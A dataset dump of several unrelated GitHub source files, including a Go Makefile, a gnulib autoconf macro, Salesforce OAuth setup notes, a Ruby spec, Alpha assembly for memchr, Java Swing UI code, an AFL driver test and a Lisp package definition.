export const bar = 'b ar'
{ "pile_set_name": "Github" }
test: deps
	go test -race -v ./...

export IPFS_API ?= v04x.ipfs.io

gx:
	go get -u github.com/whyrusleeping/gx
	go get -u github.com/whyrusleeping/gx-go

deps: gx
	gx --verbose install --global
	gx-go rewrite
	go get -t ./...
{ "pile_set_name": "Github" }
# sys_socket_h.m4 serial 23 dnl Copyright (C) 2005-2017 Free Software Foundation, Inc. dnl This file is free software; the Free Software Foundation dnl gives unlimited permission to copy and/or distribute it, dnl with or without modifications, as long as this notice is preserved. dnl From Simon Josefsson. AC_DEFUN([gl_HEADER_SYS_SOCKET], [ AC_REQUIRE([gl_SYS_SOCKET_H_DEFAULTS]) AC_REQUIRE([AC_CANONICAL_HOST]) dnl On OSF/1, the functions recv(), send(), recvfrom(), sendto() have dnl old-style declarations (with return type 'int' instead of 'ssize_t') dnl unless _POSIX_PII_SOCKET is defined. case "$host_os" in osf*) AC_DEFINE([_POSIX_PII_SOCKET], [1], [Define to 1 in order to get the POSIX compatible declarations of socket functions.]) ;; esac AC_CACHE_CHECK([whether <sys/socket.h> is self-contained], [gl_cv_header_sys_socket_h_selfcontained], [ AC_COMPILE_IFELSE([AC_LANG_PROGRAM([[#include <sys/socket.h>]], [[]])], [gl_cv_header_sys_socket_h_selfcontained=yes], [gl_cv_header_sys_socket_h_selfcontained=no]) ]) if test $gl_cv_header_sys_socket_h_selfcontained = yes; then dnl If the shutdown function exists, <sys/socket.h> should define dnl SHUT_RD, SHUT_WR, SHUT_RDWR. AC_CHECK_FUNCS([shutdown]) if test $ac_cv_func_shutdown = yes; then AC_CACHE_CHECK([whether <sys/socket.h> defines the SHUT_* macros], [gl_cv_header_sys_socket_h_shut], [ AC_COMPILE_IFELSE( [AC_LANG_PROGRAM([[#include <sys/socket.h>]], [[int a[] = { SHUT_RD, SHUT_WR, SHUT_RDWR };]])], [gl_cv_header_sys_socket_h_shut=yes], [gl_cv_header_sys_socket_h_shut=no]) ]) if test $gl_cv_header_sys_socket_h_shut = no; then SYS_SOCKET_H='sys/socket.h' fi fi fi # We need to check for ws2tcpip.h now. gl_PREREQ_SYS_H_SOCKET AC_CHECK_TYPES([struct sockaddr_storage, sa_family_t],,,[ /* sys/types.h is not needed according to POSIX, but the sys/socket.h in i386-unknown-freebsd4.10 and powerpc-apple-darwin5.5 required it. */ #include <sys/types.h> #ifdef HAVE_SYS_SOCKET_H #include <sys/socket.h> #endif #ifdef HAVE_WS2TCPIP_H #include <ws2tcpip.h> #endif ]) if test $ac_cv_type_struct_sockaddr_storage = no; then HAVE_STRUCT_SOCKADDR_STORAGE=0 fi if test $ac_cv_type_sa_family_t = no; then HAVE_SA_FAMILY_T=0 fi if test $ac_cv_type_struct_sockaddr_storage != no; then AC_CHECK_MEMBERS([struct sockaddr_storage.ss_family], [], [HAVE_STRUCT_SOCKADDR_STORAGE_SS_FAMILY=0], [#include <sys/types.h> #ifdef HAVE_SYS_SOCKET_H #include <sys/socket.h> #endif #ifdef HAVE_WS2TCPIP_H #include <ws2tcpip.h> #endif ]) fi if test $HAVE_STRUCT_SOCKADDR_STORAGE = 0 || test $HAVE_SA_FAMILY_T = 0 \ || test $HAVE_STRUCT_SOCKADDR_STORAGE_SS_FAMILY = 0; then SYS_SOCKET_H='sys/socket.h' fi gl_PREREQ_SYS_H_WINSOCK2 dnl Check for declarations of anything we want to poison if the dnl corresponding gnulib module is not in use. gl_WARN_ON_USE_PREPARE([[ /* Some systems require prerequisite headers. */ #include <sys/types.h> #include <sys/socket.h> ]], [socket connect accept bind getpeername getsockname getsockopt listen recv send recvfrom sendto setsockopt shutdown accept4]) ]) AC_DEFUN([gl_PREREQ_SYS_H_SOCKET], [ dnl Check prerequisites of the <sys/socket.h> replacement. 
AC_REQUIRE([gl_CHECK_SOCKET_HEADERS]) gl_CHECK_NEXT_HEADERS([sys/socket.h]) if test $ac_cv_header_sys_socket_h = yes; then HAVE_SYS_SOCKET_H=1 HAVE_WS2TCPIP_H=0 else HAVE_SYS_SOCKET_H=0 if test $ac_cv_header_ws2tcpip_h = yes; then HAVE_WS2TCPIP_H=1 else HAVE_WS2TCPIP_H=0 fi fi AC_SUBST([HAVE_SYS_SOCKET_H]) AC_SUBST([HAVE_WS2TCPIP_H]) ]) # Common prerequisites of the <sys/socket.h> replacement and of the # <sys/select.h> replacement. # Sets and substitutes HAVE_WINSOCK2_H. AC_DEFUN([gl_PREREQ_SYS_H_WINSOCK2], [ m4_ifdef([gl_UNISTD_H_DEFAULTS], [AC_REQUIRE([gl_UNISTD_H_DEFAULTS])]) m4_ifdef([gl_SYS_IOCTL_H_DEFAULTS], [AC_REQUIRE([gl_SYS_IOCTL_H_DEFAULTS])]) AC_CHECK_HEADERS_ONCE([sys/socket.h]) if test $ac_cv_header_sys_socket_h != yes; then dnl We cannot use AC_CHECK_HEADERS_ONCE here, because that would make dnl the check for those headers unconditional; yet cygwin reports dnl that the headers are present but cannot be compiled (since on dnl cygwin, all socket information should come from sys/socket.h). AC_CHECK_HEADERS([winsock2.h]) fi if test "$ac_cv_header_winsock2_h" = yes; then HAVE_WINSOCK2_H=1 UNISTD_H_HAVE_WINSOCK2_H=1 SYS_IOCTL_H_HAVE_WINSOCK2_H=1 else HAVE_WINSOCK2_H=0 fi AC_SUBST([HAVE_WINSOCK2_H]) ]) AC_DEFUN([gl_SYS_SOCKET_MODULE_INDICATOR], [ dnl Use AC_REQUIRE here, so that the default settings are expanded once only. AC_REQUIRE([gl_SYS_SOCKET_H_DEFAULTS]) gl_MODULE_INDICATOR_SET_VARIABLE([$1]) dnl Define it also as a C macro, for the benefit of the unit tests. gl_MODULE_INDICATOR_FOR_TESTS([$1]) ]) AC_DEFUN([gl_SYS_SOCKET_H_DEFAULTS], [ GNULIB_SOCKET=0; AC_SUBST([GNULIB_SOCKET]) GNULIB_CONNECT=0; AC_SUBST([GNULIB_CONNECT]) GNULIB_ACCEPT=0; AC_SUBST([GNULIB_ACCEPT]) GNULIB_BIND=0; AC_SUBST([GNULIB_BIND]) GNULIB_GETPEERNAME=0; AC_SUBST([GNULIB_GETPEERNAME]) GNULIB_GETSOCKNAME=0; AC_SUBST([GNULIB_GETSOCKNAME]) GNULIB_GETSOCKOPT=0; AC_SUBST([GNULIB_GETSOCKOPT]) GNULIB_LISTEN=0; AC_SUBST([GNULIB_LISTEN]) GNULIB_RECV=0; AC_SUBST([GNULIB_RECV]) GNULIB_SEND=0; AC_SUBST([GNULIB_SEND]) GNULIB_RECVFROM=0; AC_SUBST([GNULIB_RECVFROM]) GNULIB_SENDTO=0; AC_SUBST([GNULIB_SENDTO]) GNULIB_SETSOCKOPT=0; AC_SUBST([GNULIB_SETSOCKOPT]) GNULIB_SHUTDOWN=0; AC_SUBST([GNULIB_SHUTDOWN]) GNULIB_ACCEPT4=0; AC_SUBST([GNULIB_ACCEPT4]) HAVE_STRUCT_SOCKADDR_STORAGE=1; AC_SUBST([HAVE_STRUCT_SOCKADDR_STORAGE]) HAVE_STRUCT_SOCKADDR_STORAGE_SS_FAMILY=1; AC_SUBST([HAVE_STRUCT_SOCKADDR_STORAGE_SS_FAMILY]) HAVE_SA_FAMILY_T=1; AC_SUBST([HAVE_SA_FAMILY_T]) HAVE_ACCEPT4=1; AC_SUBST([HAVE_ACCEPT4]) ])
{ "pile_set_name": "Github" }
# Setup Salesforce Consumer Key and Secret

Salesforce Documentation: [http://www.salesforce.com/us/developer/docs/api_rest/Content/intro_defining_remote_access_applications.htm](http://www.salesforce.com/us/developer/docs/api_rest/Content/intro_defining_remote_access_applications.htm)

1. Create a developer account at [developer.salesforce.com](http://developer.salesforce.com)
2. From the Setup page for your developer account, select App Setup > Create > Apps
3. Click New in the Connected Apps section
4. If necessary, create a prefix for your developer account
5. Complete the form using the following information:
   - **App Name**: Full name used to identify the app (e.g. Excel Client Example)
   - **API Name**: Unique ID for identifying the app (e.g. ExcelClientExample)
   - **Contact Email**: Email used for any app-related issues
6. Check Enable OAuth Settings
7. For Callback URL, use https://login.salesforce.com/services/oauth2/callback (the Callback URL is not currently used in the Excel Client, so the example value is used)
8. Select the minimal level of OAuth Scope that works for your application and save
9. Copy the Consumer Key and Consumer Secret from the Connected App page
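The Consumer Key and Consumer Secret are what a client presents when requesting an OAuth access token. As a rough illustration only (this is not part of the Excel Client, and the username-password flow plus the `requests` dependency are assumptions for the sketch), obtaining a token might look like this:

```python
# Minimal sketch, assuming the username-password OAuth flow is enabled
# for the Connected App. All credential values below are placeholders.
import requests

TOKEN_URL = "https://login.salesforce.com/services/oauth2/token"

payload = {
    "grant_type": "password",
    "client_id": "YOUR_CONSUMER_KEY",         # from the Connected App page
    "client_secret": "YOUR_CONSUMER_SECRET",  # from the Connected App page
    "username": "user@example.com",
    "password": "password+security_token",    # password with security token appended
}

response = requests.post(TOKEN_URL, data=payload)
response.raise_for_status()
token = response.json()
print(token["access_token"], token["instance_url"])
```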
{ "pile_set_name": "Github" }
require_relative '../../spec_helper'
require_relative 'fixtures/classes'

describe "Module#<" do
  it "returns true if self is a subclass of or includes the given module" do
    (ModuleSpecs::Child < ModuleSpecs::Parent).should == true
    (ModuleSpecs::Child < ModuleSpecs::Basic).should == true
    (ModuleSpecs::Child < ModuleSpecs::Super).should == true
    (ModuleSpecs::Super < ModuleSpecs::Basic).should == true
  end

  it "returns false if self is a superclass of or included by the given module" do
    (ModuleSpecs::Parent < ModuleSpecs::Child).should be_false
    (ModuleSpecs::Basic < ModuleSpecs::Child).should be_false
    (ModuleSpecs::Super < ModuleSpecs::Child).should be_false
    (ModuleSpecs::Basic < ModuleSpecs::Super).should be_false
  end

  it "returns false if self is the same as the given module" do
    (ModuleSpecs::Child < ModuleSpecs::Child).should == false
    (ModuleSpecs::Parent < ModuleSpecs::Parent).should == false
    (ModuleSpecs::Basic < ModuleSpecs::Basic).should == false
    (ModuleSpecs::Super < ModuleSpecs::Super).should == false
  end

  it "returns nil if self is not related to the given module" do
    (ModuleSpecs::Parent < ModuleSpecs::Basic).should == nil
    (ModuleSpecs::Parent < ModuleSpecs::Super).should == nil
    (ModuleSpecs::Basic < ModuleSpecs::Parent).should == nil
    (ModuleSpecs::Super < ModuleSpecs::Parent).should == nil
  end

  it "raises a TypeError if the argument is not a class/module" do
    -> { ModuleSpecs::Parent < mock('x') }.should raise_error(TypeError)
  end
end
{ "pile_set_name": "Github" }
/* * arch/alpha/lib/ev6-memchr.S * * 21264 version contributed by Rick Gorton <[email protected]> * * Finds characters in a memory area. Optimized for the Alpha: * * - memory accessed as aligned quadwords only * - uses cmpbge to compare 8 bytes in parallel * - does binary search to find 0 byte in last * quadword (HAKMEM needed 12 instructions to * do this instead of the 9 instructions that * binary search needs). * * For correctness consider that: * * - only minimum number of quadwords may be accessed * - the third argument is an unsigned long * * Much of the information about 21264 scheduling/coding comes from: * Compiler Writer's Guide for the Alpha 21264 * abbreviated as 'CWG' in other comments here * ftp.digital.com/pub/Digital/info/semiconductor/literature/dsc-library.html * Scheduling notation: * E - either cluster * U - upper subcluster; U0 - subcluster U0; U1 - subcluster U1 * L - lower subcluster; L0 - subcluster L0; L1 - subcluster L1 * Try not to change the actual algorithm if possible for consistency. */ .set noreorder .set noat .align 4 .globl memchr .ent memchr memchr: .frame $30,0,$26,0 .prologue 0 # Hack -- if someone passes in (size_t)-1, hoping to just # search til the end of the address space, we will overflow # below when we find the address of the last byte. Given # that we will never have a 56-bit address space, cropping # the length is the easiest way to avoid trouble. zap $18, 0x80, $5 # U : Bound length beq $18, $not_found # U : ldq_u $1, 0($16) # L : load first quadword Latency=3 and $17, 0xff, $17 # E : L L U U : 00000000000000ch insbl $17, 1, $2 # U : 000000000000ch00 cmpult $18, 9, $4 # E : small (< 1 quad) string? or $2, $17, $17 # E : 000000000000chch lda $3, -1($31) # E : U L L U sll $17, 16, $2 # U : 00000000chch0000 addq $16, $5, $5 # E : Max search address or $2, $17, $17 # E : 00000000chchchch sll $17, 32, $2 # U : U L L U : chchchch00000000 or $2, $17, $17 # E : chchchchchchchch extql $1, $16, $7 # U : $7 is upper bits beq $4, $first_quad # U : ldq_u $6, -1($5) # L : L U U L : eight or less bytes to search Latency=3 extqh $6, $16, $6 # U : 2 cycle stall for $6 mov $16, $0 # E : nop # E : or $7, $6, $1 # E : L U L U $1 = quadword starting at $16 # Deal with the case where at most 8 bytes remain to be searched # in $1. E.g.: # $18 = 6 # $1 = ????c6c5c4c3c2c1 $last_quad: negq $18, $6 # E : xor $17, $1, $1 # E : srl $3, $6, $6 # U : $6 = mask of $18 bits set cmpbge $31, $1, $2 # E : L U L U nop nop and $2, $6, $2 # E : beq $2, $not_found # U : U L U L $found_it: #ifdef CONFIG_ALPHA_EV67 /* * Since we are guaranteed to have set one of the bits, we don't * have to worry about coming back with a 0x40 out of cttz... */ cttz $2, $3 # U0 : addq $0, $3, $0 # E : All done nop # E : ret # L0 : L U L U #else /* * Slow and clunky. It can probably be improved. * An exercise left for others. */ negq $2, $3 # E : and $2, $3, $2 # E : and $2, 0x0f, $1 # E : addq $0, 4, $3 # E : cmoveq $1, $3, $0 # E : Latency 2, extra map cycle nop # E : keep with cmov and $2, 0x33, $1 # E : addq $0, 2, $3 # E : U L U L : 2 cycle stall on $0 cmoveq $1, $3, $0 # E : Latency 2, extra map cycle nop # E : keep with cmov and $2, 0x55, $1 # E : addq $0, 1, $3 # E : U L U L : 2 cycle stall on $0 cmoveq $1, $3, $0 # E : Latency 2, extra map cycle nop nop ret # L0 : L U L U #endif # Deal with the case where $18 > 8 bytes remain to be # searched. $16 may not be aligned. 
.align 4 $first_quad: andnot $16, 0x7, $0 # E : insqh $3, $16, $2 # U : $2 = 0000ffffffffffff ($16<0:2> ff) xor $1, $17, $1 # E : or $1, $2, $1 # E : U L U L $1 = ====ffffffffffff cmpbge $31, $1, $2 # E : bne $2, $found_it # U : # At least one byte left to process. ldq $1, 8($0) # L : subq $5, 1, $18 # E : U L U L addq $0, 8, $0 # E : # Make $18 point to last quad to be accessed (the # last quad may or may not be partial). andnot $18, 0x7, $18 # E : cmpult $0, $18, $2 # E : beq $2, $final # U : U L U L # At least two quads remain to be accessed. subq $18, $0, $4 # E : $4 <- nr quads to be processed and $4, 8, $4 # E : odd number of quads? bne $4, $odd_quad_count # U : # At least three quads remain to be accessed mov $1, $4 # E : L U L U : move prefetched value to correct reg .align 4 $unrolled_loop: ldq $1, 8($0) # L : prefetch $1 xor $17, $4, $2 # E : cmpbge $31, $2, $2 # E : bne $2, $found_it # U : U L U L addq $0, 8, $0 # E : nop # E : nop # E : nop # E : $odd_quad_count: xor $17, $1, $2 # E : ldq $4, 8($0) # L : prefetch $4 cmpbge $31, $2, $2 # E : addq $0, 8, $6 # E : bne $2, $found_it # U : cmpult $6, $18, $6 # E : addq $0, 8, $0 # E : nop # E : bne $6, $unrolled_loop # U : mov $4, $1 # E : move prefetched value into $1 nop # E : nop # E : $final: subq $5, $0, $18 # E : $18 <- number of bytes left to do nop # E : nop # E : bne $18, $last_quad # U : $not_found: mov $31, $0 # E : nop # E : nop # E : ret # L0 : .end memchr
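The header comment above describes the core trick: replicate the target character across a quadword, XOR it with eight bytes loaded at a time, and use `cmpbge` against zero to flag any matching byte, then locate the exact byte within the quadword. A minimal Python sketch of that zero-byte-detection idea follows; it is not the kernel's code and deliberately omits the alignment, prefetching, and partial-quadword handling the assembly performs.

```python
def memchr_words(data: bytes, ch: int) -> int:
    """Find the index of byte `ch` in `data`, scanning 8 bytes per step.

    Mirrors the idea in ev6-memchr.S: replicate the target byte across a
    64-bit word, XOR with each quadword, then detect any zero byte.
    """
    pattern = ch * 0x0101010101010101          # chchchchchchchch
    i = 0
    # Whole 8-byte quadwords first.
    while i + 8 <= len(data):
        word = int.from_bytes(data[i:i + 8], "little")
        x = word ^ pattern                     # matching bytes become 0x00
        # SWAR zero-byte test (plays the role of cmpbge against zero).
        if (x - 0x0101010101010101) & ~x & 0x8080808080808080:
            for j in range(8):                 # binary search in the original
                if data[i + j] == ch:
                    return i + j
        i += 8
    # Remaining tail bytes, one at a time.
    for j in range(i, len(data)):
        if data[j] == ch:
            return j
    return -1


assert memchr_words(b"hello world", ord("w")) == 6
assert memchr_words(b"hello", ord("z")) == -1
```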
{ "pile_set_name": "Github" }
FROZEN_MACHINE(implode, request/implode, yes,, implode)
{ "pile_set_name": "Github" }
/* Copyright (c) 2015, Apple Inc. All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. Neither the name of the copyright holder(s) nor the names of any contributors may be used to endorse or promote products derived from this software without specific prior written permission. No license is granted to the trademarks of the copyright holders even if such marks are included in this software. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ @import UIKit; #import "ORKSurveyAnswerCell.h" NS_ASSUME_NONNULL_BEGIN @interface ORKSurveyAnswerCellForScale : ORKSurveyAnswerCell @end NS_ASSUME_NONNULL_END
{ "pile_set_name": "Github" }
/* * Apache License * Version 2.0, January 2004 * http://www.apache.org/licenses/ * * TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION * * 1. Definitions. * * "License" shall mean the terms and conditions for use, reproduction, * and distribution as defined by Sections 1 through 9 of this document. * * "Licensor" shall mean the copyright owner or entity authorized by * the copyright owner that is granting the License. * * "Legal Entity" shall mean the union of the acting entity and all * other entities that control, are controlled by, or are under common * control with that entity. For the purposes of this definition, * "control" means (i) the power, direct or indirect, to cause the * direction or management of such entity, whether by contract or * otherwise, or (ii) ownership of fifty percent (50%) or more of the * outstanding shares, or (iii) beneficial ownership of such entity. * * "You" (or "Your") shall mean an individual or Legal Entity * exercising permissions granted by this License. * * "Source" form shall mean the preferred form for making modifications, * including but not limited to software source code, documentation * source, and configuration files. * * "Object" form shall mean any form resulting from mechanical * transformation or translation of a Source form, including but * not limited to compiled object code, generated documentation, * and conversions to other media types. * * "Work" shall mean the work of authorship, whether in Source or * Object form, made available under the License, as indicated by a * copyright notice that is included in or attached to the work * (an example is provided in the Appendix below). * * "Derivative Works" shall mean any work, whether in Source or Object * form, that is based on (or derived from) the Work and for which the * editorial revisions, annotations, elaborations, or other modifications * represent, as a whole, an original work of authorship. For the purposes * of this License, Derivative Works shall not include works that remain * separable from, or merely link (or bind by name) to the interfaces of, * the Work and Derivative Works thereof. * * "Contribution" shall mean any work of authorship, including * the original version of the Work and any modifications or additions * to that Work or Derivative Works thereof, that is intentionally * submitted to Licensor for inclusion in the Work by the copyright owner * or by an individual or Legal Entity authorized to submit on behalf of * the copyright owner. For the purposes of this definition, "submitted" * means any form of electronic, verbal, or written communication sent * to the Licensor or its representatives, including but not limited to * communication on electronic mailing lists, source code control systems, * and issue tracking systems that are managed by, or on behalf of, the * Licensor for the purpose of discussing and improving the Work, but * excluding communication that is conspicuously marked or otherwise * designated in writing by the copyright owner as "Not a Contribution." * * "Contributor" shall mean Licensor and any individual or Legal Entity * on behalf of whom a Contribution has been received by Licensor and * subsequently incorporated within the Work. * * 2. Grant of Copyright License. 
Subject to the terms and conditions of * this License, each Contributor hereby grants to You a perpetual, * worldwide, non-exclusive, no-charge, royalty-free, irrevocable * copyright license to reproduce, prepare Derivative Works of, * publicly display, publicly perform, sublicense, and distribute the * Work and such Derivative Works in Source or Object form. * * 3. Grant of Patent License. Subject to the terms and conditions of * this License, each Contributor hereby grants to You a perpetual, * worldwide, non-exclusive, no-charge, royalty-free, irrevocable * (except as stated in this section) patent license to make, have made, * use, offer to sell, sell, import, and otherwise transfer the Work, * where such license applies only to those patent claims licensable * by such Contributor that are necessarily infringed by their * Contribution(s) alone or by combination of their Contribution(s) * with the Work to which such Contribution(s) was submitted. If You * institute patent litigation against any entity (including a * cross-claim or counterclaim in a lawsuit) alleging that the Work * or a Contribution incorporated within the Work constitutes direct * or contributory patent infringement, then any patent licenses * granted to You under this License for that Work shall terminate * as of the date such litigation is filed. * * 4. Redistribution. You may reproduce and distribute copies of the * Work or Derivative Works thereof in any medium, with or without * modifications, and in Source or Object form, provided that You * meet the following conditions: * * (a) You must give any other recipients of the Work or * Derivative Works a copy of this License; and * * (b) You must cause any modified files to carry prominent notices * stating that You changed the files; and * * (c) You must retain, in the Source form of any Derivative Works * that You distribute, all copyright, patent, trademark, and * attribution notices from the Source form of the Work, * excluding those notices that do not pertain to any part of * the Derivative Works; and * * (d) If the Work includes a "NOTICE" text file as part of its * distribution, then any Derivative Works that You distribute must * include a readable copy of the attribution notices contained * within such NOTICE file, excluding those notices that do not * pertain to any part of the Derivative Works, in at least one * of the following places: within a NOTICE text file distributed * as part of the Derivative Works; within the Source form or * documentation, if provided along with the Derivative Works; or, * within a display generated by the Derivative Works, if and * wherever such third-party notices normally appear. The contents * of the NOTICE file are for informational purposes only and * do not modify the License. You may add Your own attribution * notices within Derivative Works that You distribute, alongside * or as an addendum to the NOTICE text from the Work, provided * that such additional attribution notices cannot be construed * as modifying the License. * * You may add Your own copyright statement to Your modifications and * may provide additional or different license terms and conditions * for use, reproduction, or distribution of Your modifications, or * for any such Derivative Works as a whole, provided Your use, * reproduction, and distribution of the Work otherwise complies with * the conditions stated in this License. * * 5. Submission of Contributions. 
Unless You explicitly state otherwise, * any Contribution intentionally submitted for inclusion in the Work * by You to the Licensor shall be under the terms and conditions of * this License, without any additional terms or conditions. * Notwithstanding the above, nothing herein shall supersede or modify * the terms of any separate license agreement you may have executed * with Licensor regarding such Contributions. * * 6. Trademarks. This License does not grant permission to use the trade * names, trademarks, service marks, or product names of the Licensor, * except as required for reasonable and customary use in describing the * origin of the Work and reproducing the content of the NOTICE file. * * 7. Disclaimer of Warranty. Unless required by applicable law or * agreed to in writing, Licensor provides the Work (and each * Contributor provides its Contributions) on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or * implied, including, without limitation, any warranties or conditions * of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A * PARTICULAR PURPOSE. You are solely responsible for determining the * appropriateness of using or redistributing the Work and assume any * risks associated with Your exercise of permissions under this License. * * 8. Limitation of Liability. In no event and under no legal theory, * whether in tort (including negligence), contract, or otherwise, * unless required by applicable law (such as deliberate and grossly * negligent acts) or agreed to in writing, shall any Contributor be * liable to You for damages, including any direct, indirect, special, * incidental, or consequential damages of any character arising as a * result of this License or out of the use or inability to use the * Work (including but not limited to damages for loss of goodwill, * work stoppage, computer failure or malfunction, or any and all * other commercial damages or losses), even if such Contributor * has been advised of the possibility of such damages. * * 9. Accepting Warranty or Additional Liability. While redistributing * the Work or Derivative Works thereof, You may choose to offer, * and charge a fee for, acceptance of support, warranty, indemnity, * or other liability obligations and/or rights consistent with this * License. However, in accepting such obligations, You may act only * on Your own behalf and on Your sole responsibility, not on behalf * of any other Contributor, and only if You agree to indemnify, * defend, and hold each Contributor harmless for any liability * incurred by, or claims asserted against, such Contributor by reason * of your accepting any such warranty or additional liability. * * END OF TERMS AND CONDITIONS * * APPENDIX: How to apply the Apache License to your work. * * To apply the Apache License to your work, attach the following * boilerplate notice, with the fields enclosed by brackets "[]" * replaced with your own identifying information. (Don't include * the brackets!) The text should be enclosed in the appropriate * comment syntax for the file format. We also recommend that a * file or class name and description of purpose be included on the * same "printed page" as the copyright notice for easier * identification within third-party archives. * * Copyright [yyyy] [name of copyright owner] * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. 
* You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */
{ "pile_set_name": "Github" }
/* * Copyright (c) 1998, 2013, Oracle and/or its affiliates. All rights reserved. * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER. * * This code is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License version 2 only, as * published by the Free Software Foundation. Oracle designates this * particular file as subject to the "Classpath" exception as provided * by Oracle in the LICENSE file that accompanied this code. * * This code is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License * version 2 for more details (a copy is included in the LICENSE file that * accompanied this code). * * You should have received a copy of the GNU General Public License version * 2 along with this work; if not, write to the Free Software Foundation, * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. * * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA * or visit www.oracle.com if you need additional information or have any * questions. */ package javax.swing.plaf.metal; import sun.swing.SwingUtilities2; import sun.awt.AppContext; import javax.swing.*; import javax.swing.plaf.*; import javax.swing.plaf.basic.*; import java.awt.*; /** * A Windows L&amp;F implementation of LabelUI. This implementation * is completely static, i.e. there's only one UIView implementation * that's shared by all JLabel objects. * * @author Hans Muller */ public class MetalLabelUI extends BasicLabelUI { /** * The default <code>MetalLabelUI</code> instance. This field might * not be used. To change the default instance use a subclass which * overrides the <code>createUI</code> method, and place that class * name in defaults table under the key "LabelUI". */ protected static MetalLabelUI metalLabelUI = new MetalLabelUI(); private static final Object METAL_LABEL_UI_KEY = new Object(); /** * Returns an instance of {@code MetalLabelUI}. * * @param c a component * @return an instance of {@code MetalLabelUI} */ public static ComponentUI createUI(JComponent c) { if (System.getSecurityManager() != null) { AppContext appContext = AppContext.getAppContext(); MetalLabelUI safeMetalLabelUI = (MetalLabelUI) appContext.get(METAL_LABEL_UI_KEY); if (safeMetalLabelUI == null) { safeMetalLabelUI = new MetalLabelUI(); appContext.put(METAL_LABEL_UI_KEY, safeMetalLabelUI); } return safeMetalLabelUI; } return metalLabelUI; } /** * Just paint the text gray (Label.disabledForeground) rather than * in the labels foreground color. * * @see #paint * @see #paintEnabledText */ protected void paintDisabledText(JLabel l, Graphics g, String s, int textX, int textY) { int mnemIndex = l.getDisplayedMnemonicIndex(); g.setColor(UIManager.getColor("Label.disabledForeground")); SwingUtilities2.drawStringUnderlineCharAt(l, g, s, mnemIndex, textX, textY); } }
{ "pile_set_name": "Github" }
; Test that not specifying a stderr file isn't broken.
RUN: unset AFL_DRIVER_STDERR_DUPLICATE_FILENAME
RUN: AFLDriverTest

; Test that specifying an invalid file causes a crash.
RUN: ASAN_OPTIONS= AFL_DRIVER_STDERR_DUPLICATE_FILENAME="%T" not --crash AFLDriverTest

; Test that a file is created when specified as the duplicate stderr.
RUN: AFL_DRIVER_STDERR_DUPLICATE_FILENAME=%t AFLDriverTest
RUN: stat %t
{ "pile_set_name": "Github" }
(in-package :defpackage+-user-1) (defpackage+ :autowrap (:use #:cl #:alexandria) (:export ;; Conditions #:autowrap-condition #:autowrap-error #:autowrap-continuable-error #:simple-autowrap-continuable-error #:undefined-foreign-type #:undefined-foreign-type-contextualised #:sffi-condition #:sffi-error #:sffi-continuable-error #:simple-sffi-continuable-error #:invalid-wrapper ;; Wrapper #:wrapper #:anonymous-type #:make-anonymous-type #:make-wrapper #:wrapped-ptr #:wrapper-valid-p #:ptr #:valid-p #:invalidate #:wrap-pointer #:wrapper-null-p #:make-wrapper-instance #:autocollect #:autocollect-cancel #:with-autocollect-cancel #:making-autocollect-instance ;; Autowrap itself #:parse #:parse-file #:*foreign-type-symbol-function* #:*foreign-c-to-lisp-function* #:default-foreign-type-symbol #:default-c-to-lisp ;; SFFI #:foreign-type #:foreign-type-name #:foreign-qualified-name #:basic-foreign-type #:foreign-record #:foreign-record-bit-size #:foreign-record-bit-alignment #:foreign-record-fields #:find-record-field #:foreign-pointer #:foreign-alias #:foreign-array #:foreign-array-size #:foreign-string #:foreign-field #:foreign-record-field #:frf-bitfield-p #:frf-bit-offset #:frf-bit-alignment #:frf-bit-size #:foreign-enum #:foreign-enum-values #:enum-value #:enum-key #:foreign-symbol #:foreign-symbol-c-symbol #:foreign-extern #:foreign-function #:foreign-function-variadic-p #:basic-foreign-type #:foreign-scalar-p #:foreign-type-size #:find-type #:ensure-type #:find-function #:find-extern #:unaliased-type #:builtin-type-p #:define-foreign-alias #:define-foreign-enum #:define-foreign-extern #:define-foreign-function #:define-foreign-record #:define-foreign-type #:define-enum-from-constants #:bitfield-mask #:define-cfun #:define-cextern #:define-accessors #:define-wrapper #:define-wrapper* #:inhibit-string-conversion #:alloc-ptr #:alloc #:calloc-ptr #:calloc #:realloc #:free #:with-alloc #:with-many-alloc #:with-calloc #:c-aptr #:c-aref #:sizeof #:memcpy #:alloc-string #:defcallback #:callback #:get-errno-pointer #:errno #:int8 #:uint8 #:int16 #:uint16 #:int32 